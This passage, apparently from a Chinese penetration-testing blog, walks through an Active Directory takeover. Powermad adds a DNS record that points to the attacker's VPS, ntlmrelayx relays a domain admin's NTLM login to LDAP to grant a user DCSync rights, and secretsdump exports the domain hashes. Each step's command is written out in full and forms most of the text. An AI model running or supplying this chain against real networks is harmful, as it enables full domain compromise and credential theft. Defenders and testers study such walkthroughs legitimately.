用 Powermad 添加一条A 记录 DNS 指向我们的公网 VPS 地址。(https://github.com/Kevin-Robertson/Powermad)
cd C:\Users\demi\Desktop\Powermad-master Import-Module .\Invoke-DNSUpdate.ps1 Invoke-DNSupdate -DNSType A -DNSName unicodesec -DNSData 70.34.197.162 -Verbos可以看到回显,我们成功向域控添加了一条 DNS ,指向我们公网的 VPS。
ntlmrelay
在 VPS 上开启 ntlmrelayx.py 进行监听,命令如下
python3 ntlmrelayx.py -t ldap://192.168.136.138 --escalate-user=win10等待域管理员打开的外网打卡系统即可, 就通过 DCSYNC 等方式接管整个域的权限。一旦访问就会被中继回 LDAP 并对我们指定的用户赋予特权。
可以看到 win10 用户 被赋予 DCSYNC 的权限。
获取权限后使用impacket secretsdump.py 就可以导出本地 HASH 和域 HASH。
python3 secretsdump.py shell/win10:admin\@123@192.168.136.138完整演示GIF如下:
至此,完成整个渗透过程。
0x04 后记如果对你有用话,不来个转发 点赞 再看支持一下吗?
宽字节内网线上班